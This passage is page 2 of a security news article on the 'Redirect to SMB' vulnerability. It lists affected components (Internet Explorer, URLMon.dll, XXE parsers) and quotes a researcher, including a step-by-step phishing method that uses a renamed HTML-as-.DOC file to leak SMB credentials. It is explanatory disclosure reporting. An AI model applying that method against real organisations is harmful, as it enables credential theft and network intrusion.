18-year-old SMB vulnerability resurfaces, dozens of vendors affected

New methods expand the attack surface to applications and software beyond Windows

1 2 3 Page 2
Page 2 of 3

So what's vulnerable?

Internet Explorer has been vulnerable to the direct attack for nearly two decades, but it's also vulnerable to the Redirect to SMB attack. The WebBrowser object in .NET is also vulnerable.

"If the target is not using Internet Explorer, things get a bit trickier. My favorite way around this is to take a document from the organization's web site, save it as HTML, add an image link to my SMB server, rename the .HTML as .DOC, and email it as a 'typo correction' or 'sales inquiry' to various staff. When the users open the .DOC file, Word realizes its HTML, and then renders it with Internet Explorer, triggering the outbound connection to the SMB server. If the organization allows VPN access, the stolen/cracked credentials can then be used to access the corporate network," Moore explained.

URLMon.dll, used by Microsoft and developers to perform various operations on URLs such as downloading files, has four functions that are vulnerable to both the direct attack from 1997 and the newest SMB attack. A fifth function is also vulnerable to the direct attack, but under normal circumstances, it isn't vulnerable to the Redirect to SMB attack.

"If the application making this request calls one of the affected URLMon APIs, the machine will then make an outbound SMB connection. This significantly increases the effectiveness of man-in-the-middle attacks, even if the user isn't actively doing anything on the system," Moore added.

"I did a quick test by enabling HTTP tracing on my laptop, rebooting, and logging in. Over 100 different HTTP requests were made during that process, over half of which were not protected by SSL, and could be used to force an outbound SMB connection by a malicious attacker able to man-in-the-middle my traffic. Just resuming my laptop in a Starbucks would be enough to trigger this issue, which is a significance increase in exposure compared to an attacker having to wait for either Internet Explorer to be used or an outbound SMB connection to be made automatically."

SPEAR also discovered that XXE (XML External Entities), a feature supported by many XML parsers, could be abused to access a remote resource, which makes it vulnerable to Redirect to SMB.

Their report also includes a list of possible attack vectors that could be leveraged in a Redirect to SMB setting, including direct Man-in-the-Middle, ARP cache poisoning, browser injection, the image preview option in many chat applications, malicious documents, and DNS cache poisoning.

"In cases where you can't control the user's behavior (visiting a link or opening an email), you need to be able to control the actual network," Moore said.

"The problem with this approach is it depends on the user's machine doing something in order to trigger a SMB authentication. This could be accessing a file share, a printer, or another automated task that triggers a SMB connection. This can be time consuming, since you basically have to wait the user out, or get lucky with a share connection, in order to accomplish this attack through a man-in-the-middle. Unless the user opens Internet Explorer or makes a SMB connection directly, there is no guarantee this attack will be of much use."

Next: What software / applications are affected?

1 2 3 Page 2
Page 2 of 3
Subscribe today! Get the best in cybersecurity, delivered to your inbox.